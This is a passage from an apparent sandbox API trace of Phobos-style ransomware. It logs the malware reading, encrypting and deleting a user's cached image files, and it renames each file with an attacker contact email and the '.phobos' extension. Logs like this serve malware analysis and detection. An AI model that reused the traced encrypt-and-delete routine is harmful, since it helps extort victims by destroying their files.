HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.932] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.932] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.932] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.932] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.932] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x197c, lpOverlapped=0x0) returned 1 [0186.948] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1980, dwBufLen=0x1980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1980) returned 1 [0186.948] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1980, lpOverlapped=0x0) returned 1 [0186.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0186.949] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.949] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.949] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.949] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.949] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.949] CloseHandle (hObject=0x130) returned 1 [0186.949] CloseHandle (hObject=0x160) returned 1 [0186.949] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg")) returned 1 [0186.950] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.951] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6932) returned 1 [0186.951] CloseHandle (hObject=0x160) returned 1 [0186.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg")) returned 0x2020 [0186.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.951] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.951] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.952] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.952] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1b14, lpOverlapped=0x0) returned 1 [0186.961] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b20, dwBufLen=0x1b20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b20) returned 1 [0186.961] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1b20, lpOverlapped=0x0) returned 1 [0186.961] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0186.961] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.961] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.961] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.962] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.962] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.962] CloseHandle (hObject=0x160) returned 1 [0186.962] CloseHandle (hObject=0x130) returned 1 [0186.962] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefkgi[1].jpg")) returned 1 [0186.963] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.963] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10616) returned 1 [0186.963] CloseHandle (hObject=0x130) returned 1 [0186.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg")) returned 0x2020 [0186.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.964] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.964] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.965] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.965] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.965] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2978, lpOverlapped=0x0) returned 1 [0186.981] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2980, dwBufLen=0x2980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2980) returned 1 [0186.981] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2980, lpOverlapped=0x0) returned 1 [0186.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0186.982] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.982] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.982] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.982] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.982] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.982] CloseHandle (hObject=0x130) returned 1 [0186.982] CloseHandle (hObject=0x160) returned 1 [0186.982] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefrka[1].jpg")) returned 1 [0186.983] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.985] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2881) returned 1 [0186.985] CloseHandle (hObject=0x160) returned 1 [0186.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg")) returned 0x2020 [0186.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.985] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.985] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.986] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.986] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb41, lpOverlapped=0x0) returned 1 [0187.063] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb50, dwBufLen=0xb50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb50) returned 1 [0187.063] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb50, lpOverlapped=0x0) returned 1 [0187.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0187.064] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.064] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.064] CryptDestroyKey (hKey=0xa32a28) returned 1 [0187.064] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.064] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.064] CloseHandle (hObject=0x160) returned 1 [0187.064] CloseHandle (hObject=0x130) returned 1 [0187.065] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefy4x[1].jpg")) returned 1 [0187.066] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.066] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2328) returned 1 [0187.066] CloseHandle (hObject=0x130) returned 1 [0187.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg")) returned 0x2020 [0187.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.067] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.067] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.068] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.068] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x918, lpOverlapped=0x0) returned 1 [0187.144] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920, dwBufLen=0x920 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920) returned 1 [0187.144] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x920, lpOverlapped=0x0) returned 1 [0187.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.438] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.438] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, 